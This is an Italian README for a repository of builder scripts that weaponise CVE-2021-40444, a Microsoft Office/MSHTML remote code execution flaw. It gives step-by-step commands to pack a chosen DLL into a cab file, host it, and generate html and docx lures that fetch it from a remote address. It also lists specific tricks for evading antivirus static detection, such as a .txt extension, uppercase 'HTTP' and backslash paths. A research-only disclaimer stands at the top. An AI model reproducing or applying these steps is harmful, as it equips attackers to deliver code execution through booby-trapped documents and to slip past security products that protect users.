
Questo repository contiene builder di file cab, file html e file docx per l'exploit CVE-2021-40444.
Costruttori CVE-2021-40444
Questa repository contiene i costruttori del file cab, del file html e del file docx per l'exploit CVE-2021-40444. Questa repository è solo a scopo di test, ricerca e istruzione. Sei responsabile dell'uso che fai del codice fornito in questa repository.
Il codice è stato sviluppato tramite reverse engineering di campioni di malware trovati in circolazione e condivisi da vari ricercatori di sicurezza.
I costruttori per questa CVE sono già pubblici. Lo scopo di questa repository è verificare quanto efficacemente possiamo bypassare le rilevazioni statiche di diversi vendor di antivirus per i file docx, al momento della stesura.
Il codice JS può essere facilmente offuscato con strumenti online o manualmente. Ma il file docx contiene un solo file, document.xml.rels, su cui possono basarsi le firme. Cosa possiamo alterare al suo interno per eludere le rilevazioni statiche della maggior parte degli antivirus.
cabrc.exe è un eseguibile Microsoft incluso in Internet Explorer Administration Kit e può essere scaricato da https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads e dopo l'installazione troverai questo exe in "C:\Program Files (x86)\Windows IEAK 11"
Ci sono 3 costruttori.
Il codice funziona con Python 2.7
Per prima cosa vai nella cartella CVE-2021-40444 e posiziona lì il tuo file dll e rinominalo in IEcache.inf (oppure puoi usare la dll calc già presente).
Poi vai nella cartella source e genera il file cab
c:\cve-2021-40444\sources\python generate_cab.py
Carica il tuo file cab e, usando l'URL del file cab, genera il file html
c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (Nota: invece di usare l'estensione html, se usiamo .txt l'exploit funziona comunque, ma bypassa l'antivirus)
Ora infine carica il tuo file html e genera il file doc. Usa HTTP (maiuscolo) invece di http, e "" invece di "/", per bypassare l'antivirus. Inoltre non abbiamo bisogno di x-usc:.
esempio: c:\cve-2021-40444\sources\python generate_doc.py HTTP:\\192.168.1.12\new\tests.txt
Il risultato è davanti a te.


www.aslitsecurity.com
[email protected]